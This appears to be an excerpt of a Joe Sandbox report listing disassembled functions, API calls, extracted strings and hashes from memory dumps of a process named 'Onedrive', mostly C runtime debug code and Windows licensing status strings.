Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcessmemmove
String ID:
API String ID: 459441494-0
Opcode ID: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
Instruction ID: affee780ef41fda2b209cb331fd53c4ca93fb6873b96104e9837ae774927065d
Opcode Fuzzy Hash: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
Instruction Fuzzy Hash: 8541B432A08E46E2EE24AB69548007D7659BF84FB4F554135DF1DC7391DE3DE525C380

Function 00007FF8A032D650 Relevance: 3.1, APIs: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,00007FF8A032D827), ref: 00007FF8A032D663
Concurrency::details::UMSBackgroundPoller::~UMSBackgroundPoller.LIBCMTD ref: 00007FF8A032D698

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Background$Concurrency::details::DebuggerPollerPoller::~Present
String ID:
API String ID: 4075439979-0
Opcode ID: fba7e88bfb5c1bbf52a23c72e8edeb339766ede9cbd48fef0c18e119376efd8f
Instruction ID: 3526330d32645c809b4742227a8c42883ce96bf9522dac659612f7aa842b2abf
Opcode Fuzzy Hash: fba7e88bfb5c1bbf52a23c72e8edeb339766ede9cbd48fef0c18e119376efd8f
Instruction Fuzzy Hash: 0B31646150DBC395E7319B65A00077FBBA0EBA8388F440135F2CD85B8ADE6CD644DF51

Function 0000021BD8F8876F Relevance: 1.7, Strings: 1, Instructions: 467COMMON

Download Yara Rule

Strings

, xrefs: 0000021BD8F88832

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
Instruction ID: 86fec364868e1015b9f9913587373c049a9ac1fe7da3057e7dcc5a4dab079fb8
Opcode Fuzzy Hash: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
Instruction Fuzzy Hash: D1F10D703149088FEB4DFB19E499BA637F2FB98701F5045B8E589C7296DB34E841CB42

Function 00007FF8A031B9F0 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8A031BA15

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
Instruction ID: ebe03a7cdc663cd511be06a6663660e52537b36105bc210665a8e501d19a9633
Opcode Fuzzy Hash: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
Instruction Fuzzy Hash: 0331E62661EE859ADAA0CB15E48036AB7A0FB8D785F505135EACE83B68DF3CD1549F00

Function 00007FF8A0302B00 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

$, xrefs: 00007FF8A0302D8C

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
Instruction ID: 855d74f7074aa2e919d5b30e1d5f4f1048db8e5ea209e276121b2186cfc3faad
Opcode Fuzzy Hash: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
Instruction Fuzzy Hash: 79D11E72A1AA42ABE794CF28E442329B7E0F788394F145536E69DD77E4DB7CE4448F00

Function 00007FF6104FEBD0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6104FEBDB

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
Instruction ID: 7e28885478110239f21a65c41c7a048f3fc59d28a664755f5a2cf67f74106ce8
Opcode Fuzzy Hash: ba2b6f105ae3816e086ea7a8ddb470942bd15c703735edc8651067e593597a60
Instruction Fuzzy Hash: FBB09214F2A802E1DA04AB229D9506922A17B58B25FC00830C10EC0620DE1CA1AA8700

Function 00007FF8A0301960 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

cAAFvCF*&, xrefs: 00007FF8A03019AF

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: cAAFvCF*&
API String ID: 0-870564915
Opcode ID: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
Instruction ID: 581464832cd6e96e83d647c8702d1abcb8f5d2a4b26c9e320a477a9e93933436
Opcode Fuzzy Hash: 4bb7de6d471c858b184386500e942d622e63483a6994dd825a79aa6e95874214
Instruction Fuzzy Hash: E5719E36716A029BDB488F69E96167937A1F784780F54923AEB8E93390DF3CE845C740

Function 0000021BD8F8A71A Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
Instruction ID: ae179e8f6d7e78c3ad0cd19834c8ae0005cb8ee7d2ef2d96267a85678ec7d14a
Opcode Fuzzy Hash: 80c036b92ef97acd21fe0ddbe3dc026513253f78371ca749ad679c4476b99894
Instruction Fuzzy Hash: D2621F70218B488FDB99EF18D488B96B7E1FBA8301F5145ADE58DD7361CB30E945CB42

Function 0000021BD8F8C13F Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
Instruction ID: 7571c4111361fb1e259845a255aec5636026ffddfc6e9cca4cc9116cbea8b4e3
Opcode Fuzzy Hash: eb9f7026369abc2f533983e64922662aaf186562180a13f1a63ba32285e1e16d
Instruction Fuzzy Hash: 2F127270218A088FEB9DEB1CE458BA677F2FBA8701F1405B9D54DC7291CB74E845CB82

Function 0000021BD8F80BDF Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
Instruction ID: 2b001d1b4702511d3f134c2723939fd3c0521e6afd4864832777aa0f744a6162
Opcode Fuzzy Hash: f703cd1896e92a8ea5974dddae7fbdbbbeff298064ce552387292163702aa10e
Instruction Fuzzy Hash: 4161152512D6C54AD74E9A3858562FAFFE1DBE7605F88AAFDF4C7C3283D81094468383

Function 00007FF8A033E310 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
Instruction ID: c0ef1bc385010c0e6409d0e5d50f82895e8e0fab1137a53d08a5a692c9fda73a
Opcode Fuzzy Hash: e48766748434b3bff571e46740c1065f90807cda6717c7d4accfc1540458af72
Instruction Fuzzy Hash: 3B11257261AB429FEB54CF19E85132677A0FB48384F508439D98D87764DB3CE040CF05

Function 00007FF8A032BF7F Relevance: 70.4, APIs: 19, Strings: 21, Instructions: 417fileCOMMON

Download Yara Rule

APIs

_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032BFE3
_wcsftime_l.LIBCMTD ref: 00007FF8A032C0B5
_aligned_msize.LIBCMTD ref: 00007FF8A032C132
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C15F
_aligned_msize.LIBCMTD ref: 00007FF8A032C1AE
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C1DB
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C222
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C28F
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C2D5
_aligned_msize.LIBCMTD ref: 00007FF8A032C3C3
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C3F0
_aligned_msize.LIBCMTD ref: 00007FF8A032C40C
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C439
_aligned_msize.LIBCMTD ref: 00007FF8A032C4E1
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C50E
__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A032C542
__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A032C678
WriteFile.KERNEL32 ref: 00007FF8A032C77D
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A032C84E

Strings

Assertion failed: , xrefs: 00007FF8A032C179
strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!"), xrefs: 00007FF8A032C1D2
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 00007FF8A032C156
<file unknown>, xrefs: 00007FF8A032C011
e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1)), xrefs: 00007FF8A032C4AB
_CrtDbgReport: String too long or Invalid characters in String, xrefs: 00007FF8A032C4CD
_VCrtDbgReportA, xrefs: 00007FF8A032BFD3, 00007FF8A032C0E7, 00007FF8A032C14F, 00007FF8A032C1CB, 00007FF8A032C212, 00007FF8A032C27F, 00007FF8A032C2C5, 00007FF8A032C378, 00007FF8A032C3E0, 00007FF8A032C429, 00007FF8A032C49F, 00007FF8A032C4FE, 00007FF8A032C83E
strcat_s(szLineMessage, 4096, "\n"), xrefs: 00007FF8A032C2CC
%s(%d) : %s, xrefs: 00007FF8A032C32C
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String"), xrefs: 00007FF8A032C505
Second Chance Assertion Failed: File , xrefs: 00007FF8A032BFE8
_CrtDbgReport: String too long or IO Error, xrefs: 00007FF8A032C11E, 00007FF8A032C3AF
strcat_s(szLineMessage, 4096, szUserMessage), xrefs: 00007FF8A032C219
, Line , xrefs: 00007FF8A032C02D
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 00007FF8A032C3E7
_itoa_s(nLine, szLineMessage, 4096, 10), xrefs: 00007FF8A032BFDA, 00007FF8A032C845
(*_errno()), xrefs: 00007FF8A032C0F3, 00007FF8A032C384
minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp, xrefs: 00007FF8A032BFCC, 00007FF8A032C0DB, 00007FF8A032C148, 00007FF8A032C1C4, 00007FF8A032C20B, 00007FF8A032C278, 00007FF8A032C2BE, 00007FF8A032C36C, 00007FF8A032C3D9, 00007FF8A032C422, 00007FF8A032C493, 00007FF8A032C4F7, 00007FF8A032C837
Assertion failed!, xrefs: 00007FF8A032C18A
strcat_s(szLineMessage, 4096, "\r"), xrefs: 00007FF8A032C286
strcpy_s(szOutMessage, 4096, szLineMessage), xrefs: 00007FF8A032C430

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _invoke_watson_if_error$_aligned_msize$__vcrt_lock$FileWrite_wcsftime_l
String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szOutMessage, 4096, szLineMessage)$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
API String ID: 2594007075-2011695164
Opcode ID: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
Instruction ID: f255f427de8a88ace3a07c60efd650808280215ed71ae3d719b5357345f0a692
Opcode Fuzzy Hash: d03ea63f399c27827eb7d501663fc5a132353fde7f3ec8e3284bc11393ad2cfd
Instruction Fuzzy Hash: 2642F83291AF87A6EB20CB14E4553EA73A0FB88385F500136D68D4BBA9DF7DE545CB40

Function 00007FF6104FC9F4 Relevance: 58.7, APIs: 19, Strings: 20, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD8EE
Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD944

_wcsicmp.MSVCRT ref: 00007FF6104FCA55
_wcsicmp.MSVCRT ref: 00007FF6104FCA7B
_wcsicmp.MSVCRT ref: 00007FF6104FCAA1

Strings

TimebasedExpired, xrefs: 00007FF6104FCBC7
RebootRequired, xrefs: 00007FF6104FCAE3
KernelExpiration, xrefs: 00007FF6104FCA97
TBLExpiring, xrefs: 00007FF6104FCBA1
OEMCOAActivationFailure, xrefs: 00007FF6104FCC39
NoProductKey, xrefs: 00007FF6104FCBED
Cleanup, xrefs: 00007FF6104FCB55
VolumeRenewalRequired, xrefs: 00007FF6104FCB2F
ReActivateRequired, xrefs: 00007FF6104FCB7B
GenericUnlicensed, xrefs: 00007FF6104FCCEE
TamperDetected, xrefs: 00007FF6104FCABD
EvalNotify, xrefs: 00007FF6104FCA4B
VolumeBindingKMSNonSLP, xrefs: 00007FF6104FCC85
VolumeBindingServiceNCount, xrefs: 00007FF6104FCCA8
RepairRequired, xrefs: 00007FF6104FCC13
OEMSLPActivationFailure, xrefs: 00007FF6104FCC5F
IAActivationFailure, xrefs: 00007FF6104FCCCB
NeverActivated, xrefs: 00007FF6104FCA71
LastNotificationId, xrefs: 00007FF6104FCA0E
VolumeUnlicensed, xrefs: 00007FF6104FCB09

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: _wcsicmp
String ID: Cleanup$EvalNotify$GenericUnlicensed$IAActivationFailure$KernelExpiration$LastNotificationId$NeverActivated$NoProductKey$OEMCOAActivationFailure$OEMSLPActivationFailure$ReActivateRequired$RebootRequired$RepairRequired$TBLExpiring$TamperDetected$TimebasedExpired$VolumeBindingKMSNonSLP$VolumeBindingServiceNCount$VolumeRenewalRequired$VolumeUnlicensed
API String ID: 2081463915-1899693706
Opcode ID: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
Instruction ID: 638b39c5118f317a6863e2d5ac36f255cb327706b33e920f797d4495834834fe
Opcode Fuzzy Hash: de06abb46b7cc62a64efd2d5727dee8ebc6370a735e4bf0ffcbeb2d7c1986c94
Instruction Fuzzy Hash: 48911661A0CE0AE6FF248F15A68027C7AA5BB49FE8F518135C90EC6358DF7CE419C709

Function 00007FF8A0337EF0 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 289memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_MallocaComputeSize.LIBCONCRTD ref: 00007FF8A0337FF9
_MallocaComputeSize.LIBCONCRTD ref: 00007FF8A033800E
new[].LIBCMTD ref: 00007FF8A0338028
_MarkAllocaS.LIBCMTD ref: 00007FF8A0338035
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0338060
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A033806D
__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A0338077
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0338090

Part of subcall function 00007FF8A032A320: MultiByteToWideChar.KERNEL32 ref: 00007FF8A032A36B

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03380E7

Part of subcall function 00007FF8A0335E40: _freea_crt.LIBCPMTD ref: 00007FF8A0335E51

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0338162

Strings

minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp, xrefs: 00007FF8A0338019, 00007FF8A0338280

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiWide__crt_scoped_stack_ptr_freea_crtnew[]
String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
API String ID: 2182855091-1038314930
Opcode ID: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
Instruction ID: 94f6a93aab7a47628f9d9bf9c83a8ee27ccfaab5b027a8d17a068f05c2ae9a62
Opcode Fuzzy Hash: 4e5b80094f0f0fa01d2bbae1c9aa3c99a7f2f13ad5c29e15660c30839939a95b
Instruction Fuzzy Hash: 52F1E83290EA8296E760DB54E0857ABB7A0FB84394F400139E6CD87B99DFBCE545CF41

Function 00007FF8A0333910 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A0332110: fegetenv.LIBCMTD ref: 00007FF8A0332121

_controlfp_s.LIBCMTD ref: 00007FF8A0333990
_aligned_msize.LIBCMTD ref: 00007FF8A0333A17
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A0333A44
_aligned_msize.LIBCMTD ref: 00007FF8A0333AD3
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A0333B00

Strings

strcpy_s(result, result_count, "1#QNAN"), xrefs: 00007FF8A0333B5B
minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp, xrefs: 00007FF8A0333A2D, 00007FF8A0333AE9, 00007FF8A0333B4D, 00007FF8A0333BB1, 00007FF8A0333C15
, xrefs: 00007FF8A033395E
__acrt_fltout, xrefs: 00007FF8A0333A34, 00007FF8A0333AF0, 00007FF8A0333B54, 00007FF8A0333BB8, 00007FF8A0333C1C
1#INF, xrefs: 00007FF8A0333ABC
strcpy_s(result, result_count, "1#SNAN"), xrefs: 00007FF8A0333BBF
1#QNAN, xrefs: 00007FF8A0333B20
1#SNAN, xrefs: 00007FF8A0333B84
strcpy_s(result, result_count, "0"), xrefs: 00007FF8A0333A3B
strcpy_s(result, result_count, "1#INF" ), xrefs: 00007FF8A0333AF7
strcpy_s(result, result_count, "1#IND" ), xrefs: 00007FF8A0333C23
1#IND, xrefs: 00007FF8A0333BE8

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: _aligned_msize_invoke_watson_if_error$_controlfp_sfegetenv
String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
API String ID: 436164602-1152488507
Opcode ID: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
Instruction ID: 87926c651cb27f1773d35b3ad260e09bbf003d91f0d883b6df0e9de66346264d
Opcode Fuzzy Hash: b18c9ca64db226cc6873a84e4e06ebe99eb580fab364faa48c7c8acdb43524ed
Instruction Fuzzy Hash: 4EA12D72A0EB82A5EB60DB15E4903AAB7A0FB843C4F405136E6DD477A9CF3DE544CB41

Function 00007FF8A031E6F0 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF8A031E759
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A031E80F
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A031E8C2

Strings

wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00007FF8A031ED20
Microsoft Visual C++ Runtime Library, xrefs: 00007FF8A031ED34
Line: , xrefs: 00007FF8A031EA43
_CrtDbgReport: String too long or IO Error, xrefs: 00007FF8A031ECE8
File: , xrefs: 00007FF8A031EA9A
Expression: , xrefs: 00007FF8A031E9B3
(*_errno()), xrefs: 00007FF8A031ECB7
@, xrefs: 00007FF8A031E839
..., xrefs: 00007FF8A031EB1E
Module: , xrefs: 00007FF8A031EB49
common_message_window, xrefs: 00007FF8A031E7FF, 00007FF8A031ECAB, 00007FF8A031ED19
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 00007FF8A031E7F8, 00007FF8A031EC9F, 00007FF8A031ED12
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 00007FF8A031E806
@, xrefs: 00007FF8A031E904

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
